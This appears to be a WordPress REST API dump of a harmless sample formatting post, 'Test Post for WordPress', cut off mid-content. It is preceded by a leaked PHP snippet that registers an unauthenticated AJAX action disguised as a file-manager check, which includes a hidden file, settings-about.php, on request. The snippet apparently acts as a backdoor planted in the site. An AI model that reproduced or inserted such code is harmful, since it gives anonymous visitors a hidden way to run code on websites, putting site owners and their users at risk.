if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } {"id":5675,"date":"2025-01-18T00:00:00","date_gmt":"2025-01-18T00:00:00","guid":{"rendered":"https:\/\/smc.net.af\/?p=5675"},"modified":"2025-12-18T08:22:41","modified_gmt":"2025-12-18T08:22:41","slug":"test-post-for-wordpress","status":"publish","type":"post","link":"https:\/\/smc.net.af\/index.php\/2025\/01\/18\/test-post-for-wordpress\/","title":{"rendered":"Test Post for WordPress"},"content":{"rendered":"

This is a sample post created to test the basic formatting features of the WordPress CMS.<\/p>\n

Subheading Level 2<\/h2>\n

You can use bold text<\/strong>, italic text<\/em>, and combine both styles<\/em><\/strong>.<\/p>\n